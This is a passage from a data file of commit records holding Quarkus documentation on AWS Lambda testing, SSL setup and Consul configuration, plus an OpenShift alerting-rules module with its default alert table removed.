`src\/test\/resources\/application.properties`. If not included, the integration tests will be in a constant loop.\n\n[source,properties]\n----\nquarkus.lambda.enable-polling-jvm-mode=true\n----\n\nNOTE: If you are following along with the example Maven archetype project for AWS Lambda in this guide,\nit includes the required property `quarkus.lambda.enable-polling-jvm-mode=true` in the test `application.properties`.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaHandlerTest {\n\n @Test\n public void testSimpleLambdaSuccess() throws Exception {\n InputObject in = new InputObject();\n in.setGreeting(\"Hello\");\n in.setName(\"Stu\");\n\n OutputObject out = LambdaClient.invoke(OutputObject.class, in);\n\n Assertions.assertEquals(\"Hello Stu\", out.getResult());\n Assertions.assertTrue(out.getRequestId().matches(\"aws-request-\\\\d\"), \"Expected requestId as 'aws-request-<number>'\");\n }\n}\n----\n\nSimilarly, if you are using a `RequestStreamHandler` implementation, you can add a matching JUnit test, like below,\nwhich aligns to the generated `StreamLambda` class in the generated project.\n\nObviously, these two types of tests are mutually exclusive. You must have a test that corresponds to the implemented AWS Lambda interfaces,\nwhether `RequestHandler<?, ?>` or `RequestStreamHandler`.\n\nTwo versions of the Test for `RequestStreamHandler` are presented below. You can use either, depending on\nthe needs of your Unit test. The first is obviously simpler and quicker. 
Using Java streams can require more coding.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaStreamHandlerTest {\n\n private static Logger LOG = Logger.getLogger(LambdaStreamHandlerTest.class);\n\n @Test\n public void testSimpleLambdaSuccess() throws Exception {\n String out = LambdaClient.invoke(String.class, \"lowercase\");\n Assertions.assertEquals(\"LOWERCASE\", out);\n }\n\n @Test\n public void testInputStreamSuccess() {\n try {\n String input = \"{ \\\"name\\\": \\\"Bill\\\", \\\"greeting\\\": \\\"hello\\\"}\";\n InputStream inputStream = new ByteArrayInputStream(input.getBytes());\n ByteArrayOutputStream outputStream = new ByteArrayOutputStream();\n\n LambdaClient.invoke(inputStream, outputStream);\n\n ByteArrayInputStream out = new ByteArrayInputStream(outputStream.toByteArray());\n StringBuilder response = new StringBuilder();\n int i = 0;\n while ((i = out.read()) != -1) {\n response.append((char)i);\n }\n\n Assertions.assertTrue(response.toString().contains(\"BILL\"));\n } catch (Exception e) {\n Assertions.fail(e.getMessage());\n }\n }\n\n}\n----\n\nIf your code uses CDI injection, this too will be executed, along with mocking functionality, see the link:getting-started-testing[Test Guide] for more details.\n\nTo add JUnit functionality for native tests, add the `@NativeImageTest` annotation to a subclass of your test class, which will execute against your native image, and can be leveraged in an IDE.\n\n\n== Testing with the SAM CLI\n\nThe https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI]\nallows you to run your lambdas locally on your laptop in a simulated Lambda environment. This requires\nhttps:\/\/www.docker.com\/products\/docker-desktop[docker] to be installed. This is an optional approach should you choose\nto take advantage of it. Otherwise, the Quarkus JUnit integration should be sufficient for most of your needs.\n\nA starter template has been generated for both JVM and native execution modes.\n\nRun the following SAM CLI command to locally test your lambda function, passing the appropriate SAM `template`.\nThe `event` parameter takes any JSON file, in this case the sample `payload.json`.\n\nNOTE: If using Gradle, the path to the binaries in the YAML templates must be changed from `target` to `build`\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nThe native image can also be locally tested using the `sam.native.yaml` template:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Modifying `function.zip`\n\nThe are times where you may have to add some additions to the `function.zip` lambda deployment that is generated\nby the build. To do this create a `zip.jvm` or `zip.native` directory within `src\/main`.\nCreate `zip.jvm\/` if you are doing a pure Java lambda. `zip.native\/` if you are doing a native deployment.\n\nAny you files and directories you create under your zip directory will be included within `function.zip`\n\n== Custom `bootstrap` script\n\nThere are times you may want to set a specific system properties or other arguments when lambda invokes\nyour native quarkus lambda deployment. 
If you include a `bootstrap` script file within\n`zip.native`, the quarkus extension will automatically rename the executable to `runner` within\n`function.zip` and set the unix mode of the `bootstrap` script to executable.\n\nNOTE: The native executable must be referenced as `runner` if you include a custom `bootstrap` script.\n\nThe extension generates an example script within `target\/bootstrap-example.sh`.\n\n== Tracing with AWS XRay and GraalVM\n\nIf you are building native images, and want to use https:\/\/aws.amazon.com\/xray[AWS X-Ray Tracing] with your lambda\nyou will need to include `quarkus-amazon-lambda-xray` as a dependency in your pom. The AWS X-Ray\nlibrary is not fully compatible with GraalVM so we had to do some integration work to make this work.\n\nIn addition, remember to enable the AWS X-Ray tracing parameter in `manage.sh`, in the `cmd_create()` function. This can also be set in the AWS Management Console.\n[source,bash]\n----\n --tracing-config Mode=Active\n----\n\nFor the sam template files, add the following to the YAML function Properties.\n[source]\n----\n Tracing: Active\n----\n\nAWS X-Ray does add many classes to your distribution, do ensure you are using at least the 256MB AWS Lambda memory size.\nThis is explicitly set in `manage.sh` `cmd_create()`. Whilst the native image potentially can always use a lower memory setting, it would be recommended to keep the setting the same, especially to help compare performance.\n\n[[https]]\n== Using HTTPS or SSL\/TLS\n\nIf your code makes HTTPS calls, such as to a micro-service (or AWS service), you will need to add configuration to the native image,\nas GraalVM will only include the dependencies when explicitly declared. Quarkus, by default enables this functionality on extensions that implicitly require it.\nFor further information, please consult the link:native-and-ssl[Quarkus SSL guide]\n\nOpen src\/main\/resources\/application.properties and add the following line to enable SSL in your native image.\n\n[source,properties]\n----\nquarkus.ssl.native=true\n----\n\n[[aws-sdk-v2]]\n== Using the AWS Java SDK v2\n\nNOTE: Quarkus now has extensions for DynamoDB, S3, SNS and SQS (more coming). 
Please check those guides on how to use the various AWS Services with Quarkus, as opposed to wiring manually like below.\n\nWith minimal integration, it is possible to leverage the AWS Java SDK v2,\nwhich can be used to invoke services such as SQS, SNS, S3 and DynamoDB.\n\nFor native image, however the URL Connection client must be preferred over the Apache HTTP Client\nwhen using synchronous mode, due to issues in the GraalVM compilation (at present).\n\nAdd `quarkus-jaxb` as a dependency in your Maven `pom.xml`, or Gradle `build.gradle` file.\n\nYou must also force your AWS service client for SQS, SNS, S3 et al, to use the URL Connection client,\nwhich connects to AWS services over HTTPS, hence the inclusion of the SSL enabled property, as described in the <<https>> section above.\n\n[source,java]\n----\n\/\/ select the appropriate client, in this case SQS, and\n\/\/ insert your region, instead of XXXX, which also improves startup time over the default client\n client = SqsClient.builder().region(Region.XXXX).httpClient(software.amazon.awssdk.http.urlconnection.UrlConnectionHttpClient.builder().build()).build();\n----\n\nFor Maven, add the following to your `pom.xml`.\n\n[source,xml]\n----\n\n <properties>\n <aws.sdk2.version>2.10.69<\/aws.sdk2.version>\n <\/properties>\n\n <dependencyManagement>\n <dependencies>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>bom<\/artifactId>\n <version>${aws.sdk2.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>url-connection-client<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>apache-client<\/artifactId>\n <exclusions>\n <exclusion>\n <groupId>commons-logging<\/groupId>\n <artifactId>commons-logging<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <!-- sqs\/sns\/s3 etc -->\n <artifactId>sqs<\/artifactId>\n <exclusions>\n <!-- exclude the apache-client and netty client -->\n <exclusion>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>apache-client<\/artifactId>\n <\/exclusion>\n <exclusion>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>netty-nio-client<\/artifactId>\n <\/exclusion>\n <exclusion>\n <groupId>commons-logging<\/groupId>\n <artifactId>commons-logging<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n\n <dependency>\n <groupId>org.jboss.logging<\/groupId>\n <artifactId>commons-logging-jboss-logging<\/artifactId>\n <version>1.0.0.Final<\/version>\n <\/dependency>\n <\/dependencies>\n----\n\nNOTE: if you see `java.security.InvalidAlgorithmParameterException: the trustAnchors parameter must be non-empty` or similar SSL error, due to the current status of GraalVM,\nthere is some additional work to bundle the `function.zip`, as below. For more information, please see the link:native-and-ssl[Quarkus Native SSL Guide].\n\n== Additional requirements for client SSL\n\nThe native executable requires some additional steps to enable client ssl that S3 and other aws libraries need.\n\n1. A custom `bootstrap` script\n2. `libsunec.so` must be added to `function.zip`\n3. `cacerts` must be added to `function.zip`\n\nTo do this, first create a directory `src\/main\/zip.native\/` with your build. 
Next create a shell script file called `bootstrap`\nwithin `src\/main\/zip.native\/`, like below. An example is create automatically in your build folder (target or build), called `bootstrap-example.sh`\n\n[source,bash]\n----\n#!\/usr\/bin\/env bash\n\n.\/runner -Djava.library.path=.\/ -Djavax.net.ssl.trustStore=.\/cacerts\n----\n\nAdditional set `-Djavax.net.ssl.trustStorePassword=changeit` if your `cacerts` file is password protected.\n\nNext you must copy some files from your GraalVM distribution into `src\/main\/zip.native\/`.\n\nNOTE: GraalVM versions can have different paths for these files, and whether you using the Java 8 or 11 version. Adjust accordingly.\n\n[source,bash]\n----\ncp $GRAALVM_HOME\/lib\/libsunec.so $PROJECT_DIR\/src\/main\/zip.native\/\ncp $GRAALVM_HOME\/lib\/security\/cacerts $PROJECT_DIR\/src\/main\/zip.native\/\n----\n\nNow when you run the native build all these files will be included within `function.zip`\n\nNOTE: If you are using a Docker image to build, then you must extract these files from this image.\n\nTo extract the required ssl, you must start up a Docker container in the background, and attach to that container to copy the artifacts.\n\nFirst, let's start the GraalVM container, noting the container id output.\n[source,bash,subs=attributes+]\n----\ndocker run -it -d --entrypoint bash quay.io\/quarkus\/ubi-quarkus-native-image:{graalvm-flavor}\n\n# This will output a container id, like 6304eea6179522aff69acb38eca90bedfd4b970a5475aa37ccda3585bc2abdde\n# Note this value as we will need it for the commands below\n----\n\nFirst, libsunec.so, the C library used for the SSL implementation:\n\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/jre\/lib\/amd64\/libsunec.so src\/main\/zip.native\/\n----\n\nSecond, cacerts, the certificate store. 
You may need to periodically obtain an updated copy, also.\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/jre\/lib\/security\/cacerts src\/main\/zip.native\/\n----\n\nYour final archive will look like this:\n[source,bash]\n----\njar tvf target\/function.zip\n\n bootstrap\n runner\n cacerts\n libsunec.so\n----\n\n== Amazon Alexa Integration\n\nTo use Alexa with Quarkus native, please add the following extension.\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-amazon-alexa<\/artifactId>\n <\/dependency>\n----\n\nCreate your Alexa handler, as normal, by sub-classing the abstract `com.amazon.ask.SkillStreamHandler`, and add your request handler implementation.\n\nThat's all there is to it!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50da055ae8e16bb8d83b13366635492ab329ebd1","subject":"Fix typos in the consul-config.adoc guide","message":"Fix typos in the consul-config.adoc guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Reading properties from Consul\n\ninclude::.\/attributes.adoc[]\n:extension-status: preview\n\nThis guide explains how your Quarkus application can read configuration properties at runtime from https:\/\/www.consul.io[Consul].\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 11+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\n\n== Introduction\n\nConsul is a versatile system which among other things, provides a distributed Key-Value store that is used in many architectures as a source of configuration for services.\nThis Key-Value store is what the `quarkus-consul-config` extension interacts with in order to allow Quarkus applications to read runtime configuration properties from Consul.\n\n== Starting Consul\n\nThere are various ways to start Consul that vary in complexity, but for the purposes of this guide, we elect to start a single Consul server with no persistence via Docker, like so:\n\n[source,bash]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nPlease consult the https:\/\/www.consul.io\/docs\/install[documentation] to learn more about the various Consul installation options.\n\n== Creating the Maven project\n\nFirst, we need a new project. 
Create a new project with the following command:\n\n[source,bash,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=consul-config-quickstart \\\n -DclassName=\"org.acme.consul.config.GreetingResource\" \\\n -Dpath=\"\/greeting\" \\\n -Dextensions=\"consul-config\"\ncd consul-config-quickstart\n----\n\nThis command generates a Maven project with a REST endpoint and imports the `consul-config` extension.\n\nIf you already have your Quarkus project configured, you can add the `consul-config` extension\nto your project by running the following command in your project base directory:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"consul-config\"\n----\n\nThis will add the following to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-consul-config<\/artifactId>\n<\/dependency>\n----\n\n== GreetingController\n\nThe Quarkus Maven plugin automatically generated a `GreetingResource` JAX-RS resource in the\n`src\/main\/java\/org\/acme\/consul\/config\/client\/GreetingResource.java` file that looks like:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/greeting\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nAs we want to use configuration properties obtained from the Config Server, we will update the `GreetingResource` to inject the `message` property. The updated code will look like this:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\n@Path(\"\/greeting\")\npublic class GreetingResource {\n\n @ConfigProperty(name = \"greeting.message\", defaultValue=\"Hello from default\")\n String message;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return message;\n }\n}\n----\n\n== Configuring the application\n\nQuarkus provides various configuration knobs under the `quarkus.consul-config` root. For the purposes of this guide, our Quarkus application is going to be configured in `application.properties` as follows:\n\n[source,properties]\n----\n# use the same name as the application name that was configured when standing up the Config Server\nquarkus.application.name=consul-test\n# enable retrieval of configuration from Consul - this is off by default\nquarkus.consul-config.enabled=true\n# this is a key in Consul's KV store that the Quarkus application will read and try to extract properties from\nquarkus.consul-config.properties-value-keys=config\/${quarkus.application.name}\n----\n\n== Add Configuration to Consul\n\nFor the previous application configuration to work, we need to add a `config\/consul-test` key under Consul's Key Value store. The value of this key will essentially be a properties \"file\" containing the application configuration.\nIn this case we want to add the following data to the `config\/consul-test` key:\n\n[source,properties]\n----\ngreeting.message=Hello from Consul\n----\n\nWhen adding this configuration from the UI, Consul will automatically convert the data into the necessary base64 encoding. 
If you instead add the configuration via the Consul's https:\/\/www.consul.io\/api\/kv.html#create-update-key[REST API],\nmake sure to first encode the previous data into base64.\n\nNOTE: In this use case we made the value of the key as a properties \"file\", because we used `quarkus.consul-config.properties-value-keys` in the application. The\nextension also provides the ability to use the raw values of keys when `quarkus.consul-config.raw-value-keys` is used. Furthermore, these two properties can be used\nsimultaneously, while each one also supports setting multiple keys.\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nThe result should be: `Hello from Consul` as it is the value obtained from the Consul Key Value store.\n\n== Run the application as a native executable\n\nYou can of course create a native image using the instructions of the link:building-native-image[Building a native executable guide].\n\n== Configuration Reference\n\ninclude::{generated-dir}\/config\/quarkus-consul-config.adoc[opts=optional, leveloffset=+1]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Reading properties from Consul\n\ninclude::.\/attributes.adoc[]\n:extension-status: preview\n\nThis guide explains how your Quarkus application can read configuration properties at runtime from https:\/\/www.consul.io[Consul].\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 11+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\n\n== Introduction\n\nConsul is a versatile system which among other things, provides a distributed Key-Value store that is used in many architectures as a source of configuration for services.\nThis Key-Value store is what the `quarkus-consul-config` extension interacts with in order to allow Quarkus applications to read runtime configuration properties from Consul.\n\n== Starting Consul\n\nThere are various ways to start Consul that vary in complexity, but for the purposes of this guide, we elect to start a single Consul server with no persistence via Docker, like so:\n\n[source,bash]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nPlease consult the https:\/\/www.consul.io\/docs\/install[documentation] to learn more about the various Consul installation options.\n\n== Creating the Maven project\n\nFirst, we need a new project. 
Create a new project with the following command:\n\n[source,bash,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=consul-config-quickstart \\\n -DclassName=\"org.acme.consul.config.GreetingResource\" \\\n -Dpath=\"\/greeting\" \\\n -Dextensions=\"consul-config\"\ncd consul-config-quickstart\n----\n\nThis command generates a Maven project with a REST endpoint and imports the `consul-config` extension.\n\nIf you already have your Quarkus project configured, you can add the `consul-config` extension\nto your project by running the following command in your project base directory:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"consul-config\"\n----\n\nThis will add the following to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-consul-config<\/artifactId>\n<\/dependency>\n----\n\n== GreetingController\n\nThe Quarkus Maven plugin automatically generated a `GreetingResource` JAX-RS resource in the\n`src\/main\/java\/org\/acme\/consul\/config\/client\/GreetingResource.java` file that looks like:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nAs we want to use configuration properties obtained from the Config Server, we will update the `GreetingResource` to inject the `message` property. The updated code will look like this:\n\n[source,java]\n----\npackage org.acme.consul.config.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @ConfigProperty(name = \"message\", defaultValue=\"Hello from default\")\n String message;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return message;\n }\n}\n----\n\n== Configuring the application\n\nQuarkus provides various configuration knobs under the `quarkus.consul-config` root. For the purposes of this guide, our Quarkus application is going to be configured in `application.properties` as follows:\n\n[source,properties]\n----\n# use the same name as the application name that was configured when standing up the Config Server\nquarkus.application.name=consul-test\n# enable retrieval of configuration from Consul - this is off by default\nquarkus.consul-config.enabled=true\n# this is a key in Consul's KV store that the Quarkus application will read and try to extract properties from\nquarkus.consul-config.properties-value-keys=config\/${quarkus.application.name}\n----\n\n== Add Configuration to Consul\n\nFor the previous application configuration to work, we need to add a `config\/consul-test` key under Consul's Key Value store. The value of this key will essentially be a properties \"file\" containing the application configuration.\nIn this case we want to add the following data to the `config\/consul-test` key:\n\n[source,properties]\n----\ngreeting.message=Hello from Consul\n----\n\nWhen adding this configuration from the UI, Consul will automatically convert the data into the necessary base64 encoding. 
If you instead add the configuration via the Consul's https:\/\/www.consul.io\/api\/kv.html#create-update-key[REST API],\nmake sure to first encode the previous data into base64.\n\nNOTE: In this use case we made the value of the key as a properties \"file\", because we used `quarkus.consul-config.properties-value-keys` in the application. The\nextension also provides the ability to use the raw values of keys when `quarkus.consul-config.raw-value-keys` is used. Furthermore, these two properties can be used\nsimultaneously, while each one also supports setting multiple keys.\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nThe result should be: `Hello from Consul` as it is the value obtained from the Consul Key Value store.\n\n== Run the application as a native executable\n\nYou can of course create a native image using the instructions of the link:building-native-image[Building a native executable guide].\n\n== Configuration Reference\n\ninclude::{generated-dir}\/config\/quarkus-consul-config.adoc[opts=optional, leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4b200dc0cc68f42cab066f105f0238757ef5d2f","subject":"Delete the default alerting rules table","message":"Delete the default alerting rules table\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/monitoring-alerting-rules.adoc","new_file":"modules\/monitoring-alerting-rules.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/configuring-monitoring-stack.adoc\n\n[id=\"alerting-rules-{context}\"]\n== Alerting rules\n\n{product-title} Cluster Monitoring by default ships with alerting rules defined in the link:https:\/\/github.com\/openshift\/cluster-monitoring-operator\/blob\/master\/assets\/prometheus-k8s\/rules.yaml[rules configuration file]. #FIXME what's the correct file?#\n\nNote that:\n\n* Currently you cannot add custom alerting rules.\n* Some alerting rules have identical names. This is intentional. They are alerting about the same event with different thresholds, with different severity, or both.\n* With the inhibition rules, the lower severity is inhibited when the higher severity is firing.\n* #FIXME anything else to mention?#\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/configuring-monitoring-stack.adoc\n\n[id=\"alerting-rules-{context}\"]\n== Alerting rules\n\n{product-title} Cluster Monitoring ships with the following alerting rules configured by default. Currently you cannot add custom alerting rules.\n\nSome alerting rules have identical names. This is intentional. They are alerting about the same event with different thresholds, with different severity, or both. 
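To picture what such same-named rules look like, here is a hypothetical snippet in the Prometheus rules format; the metric name, thresholds, and durations are invented for illustration and are not the shipped values:

[source,yaml]
----
groups:
- name: example-latency-rules
  rules:
  - alert: KubeAPILatencyHigh
    expr: apiserver_request_latency_seconds:p99 > 1
    for: 10m
    labels:
      severity: warning
  - alert: KubeAPILatencyHigh   # same name, higher threshold and severity
    expr: apiserver_request_latency_seconds:p99 > 4
    for: 10m
    labels:
      severity: critical
----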
With the inhibition rules, the lower severity is inhibited when the higher severity is firing.\n\nFor more details on the alerting rules, see the link:https:\/\/github.com\/openshift\/cluster-monitoring-operator\/blob\/master\/assets\/prometheus-k8s\/rules.yaml[configuration file].\n\n[options=\"header\"]\n|===\n|Alert|Severity|Description\n|`ClusterMonitoringOperatorErrors`|`critical`|Cluster Monitoring Operator is experiencing _X_% errors.\n|`AlertmanagerDown`|`critical`|Alertmanager has disappeared from Prometheus target discovery.\n|`ClusterMonitoringOperatorDown`|`critical`|ClusterMonitoringOperator has disappeared from Prometheus target discovery.\n|`KubeAPIDown`|`critical`|KubeAPI has disappeared from Prometheus target discovery.\n|`KubeControllerManagerDown`|`critical`|KubeControllerManager has disappeared from Prometheus target discovery.\n|`KubeSchedulerDown`|`critical`|KubeScheduler has disappeared from Prometheus target discovery.\n|`KubeStateMetricsDown`|`critical`|KubeStateMetrics has disappeared from Prometheus target discovery.\n|`KubeletDown`|`critical`|Kubelet has disappeared from Prometheus target discovery.\n|`NodeExporterDown`|`critical`|NodeExporter has disappeared from Prometheus target discovery.\n|`PrometheusDown`|`critical`|Prometheus has disappeared from Prometheus target discovery.\n|`PrometheusOperatorDown`|`critical`|PrometheusOperator has disappeared from Prometheus target discovery.\n|`KubePodCrashLooping`|`critical`|_Namespace\/Pod_ (_Container_) is restarting _times_ \/ second\n|`KubePodNotReady`|`critical`|_Namespace\/Pod_ is not ready.\n|`KubeDeploymentGenerationMismatch`|`critical`|Deployment _Namespace\/Deployment_ generation mismatch\n|`KubeDeploymentReplicasMismatch`|`critical`|Deployment _Namespace\/Deployment_ replica mismatch\n|`KubeStatefulSetReplicasMismatch`|`critical`|StatefulSet _Namespace\/StatefulSet_ replica mismatch\n|`KubeStatefulSetGenerationMismatch`|`critical`|StatefulSet _Namespace\/StatefulSet_ generation mismatch\n|`KubeDaemonSetRolloutStuck`|`critical`|Only _X_% of desired pods scheduled and ready for daemon set _Namespace\/DaemonSet_\n|`KubeDaemonSetNotScheduled`|`warning`|A number of pods of daemonset _Namespace\/DaemonSet_ are not scheduled.\n|`KubeDaemonSetMisScheduled`|`warning`|A number of pods of daemonset _Namespace\/DaemonSet_ are running where they are not supposed to run.\n|`KubeCronJobRunning`|`warning`|CronJob _Namespace\/CronJob_ is taking more than 1h to complete.\n|`KubeJobCompletion`|`warning`|Job _Namespaces\/Job_ is taking more than 1h to complete.\n|`KubeJobFailed`|`warning`|Job _Namespaces\/Job_ failed to complete.\n|`KubeCPUOvercommit`|`warning`|Overcommited CPU resource requests on Pods, cannot tolerate node failure.\n|`KubeMemOvercommit`|`warning`|Overcommited Memory resource requests on Pods, cannot tolerate node failure.\n|`KubeCPUOvercommit`|`warning`|Overcommited CPU resource request quota on Namespaces.\n|`KubeMemOvercommit`|`warning`|Overcommited Memory resource request quota on Namespaces.\n|`alerKubeQuotaExceeded`|`warning`|_X_% usage of _Resource_ in namespace _Namespace_.\n|`KubePersistentVolumeUsageCritical`|`critical`|The persistent volume claimed by _PersistentVolumeClaim_ in namespace _Namespace_ has _X_% free.\n|`KubePersistentVolumeFullInFourDays`|`critical`|Based on recent sampling, the persistent volume claimed by _PersistentVolumeClaim_ in namespace _Namespace_ is expected to fill up within four days. 
Currently _X_ bytes are available.\n|`KubeNodeNotReady`|`warning`|_Node_ has been unready for more than an hour\n|`KubeVersionMismatch`|`warning`|There are _X_ different versions of Kubernetes components running.\n|`KubeClientErrors`|`warning`|Kubernetes API server client '_Job\/Instance_' is experiencing _X_% errors.'\n|`KubeClientErrors`|`warning`|Kubernetes API server client '_Job\/Instance_' is experiencing _X_ errors \/ sec.'\n|`KubeletTooManyPods`|`warning`|Kubelet _Instance_ is running _X_ pods, close to the limit of 110.\n|`KubeAPILatencyHigh`|`warning`|The API server has a 99th percentile latency of _X_ seconds for _Verb_ _Resource_.\n|`KubeAPILatencyHigh`|`critical`|The API server has a 99th percentile latency of _X_ seconds for _Verb_ _Resource_.\n|`KubeAPIErrorsHigh`|`critical`|API server is erroring for _X_% of requests.\n|`KubeAPIErrorsHigh`|`warning`|API server is erroring for _X_% of requests.\n|`KubeClientCertificateExpiration`|`warning`|Kubernetes API certificate is expiring in less than 7 days.\n|`KubeClientCertificateExpiration`|`critical`|Kubernetes API certificate is expiring in less than 1 day.\n|`AlertmanagerConfigInconsistent`|`critical`|Summary: Configuration out of sync. Description: The configuration of the instances of the Alertmanager cluster `_Service_` are out of sync.\n|`AlertmanagerFailedReload`|`warning`|Summary: Alertmanager's configuration reload failed. Description: Reloading Alertmanager's configuration has failed for _Namespace\/Pod_.\n|`TargetDown`|`warning`|Summary: Targets are down. Description: _X_% of _Job_ targets are down.\n|`DeadMansSwitch`|`none`|Summary: Alerting DeadMansSwitch. Description: This is a DeadMansSwitch meant to ensure that the entire Alerting pipeline is functional.\n|`NodeDiskRunningFull`|`warning`|Device _Device_ of node-exporter _Namespace\/Pod_ is running full within the next 24 hours.\n|`NodeDiskRunningFull`|`critical`|Device _Device_ of node-exporter _Namespace\/Pod_ is running full within the next 2 hours.\n|`PrometheusConfigReloadFailed`|`warning`|Summary: Reloading Prometheus' configuration failed. Description: Reloading Prometheus' configuration has failed for _Namespace\/Pod_\n|`PrometheusNotificationQueueRunningFull`|`warning`|Summary: Prometheus' alert notification queue is running full. Description: Prometheus' alert notification queue is running full for _Namespace\/Pod_\n|`PrometheusErrorSendingAlerts`|`warning`|Summary: Errors while sending alert from Prometheus. Description: Errors while sending alerts from Prometheus _Namespace\/Pod_ to Alertmanager _Alertmanager_\n|`PrometheusErrorSendingAlerts`|`critical`|Summary: Errors while sending alerts from Prometheus. Description: Errors while sending alerts from Prometheus _Namespace\/Pod_ to Alertmanager _Alertmanager_\n|`PrometheusNotConnectedToAlertmanagers`|`warning`|Summary: Prometheus is not connected to any Alertmanagers. Description: Prometheus _Namespace\/Pod_ is not connected to any Alertmanagers\n|`PrometheusTSDBReloadsFailing`|`warning`|Summary: Prometheus has issues reloading data blocks from disk. Description: _Job_ at _Instance_ had _X_ reload failures over the last four hours.\n|`PrometheusTSDBCompactionsFailing`|`warning`|Summary: Prometheus has issues compacting sample blocks. Description: _Job_ at _Instance_ had _X_ compaction failures over the last four hours.\n|`PrometheusTSDBWALCorruptions`|`warning`|Summary: Prometheus write-ahead 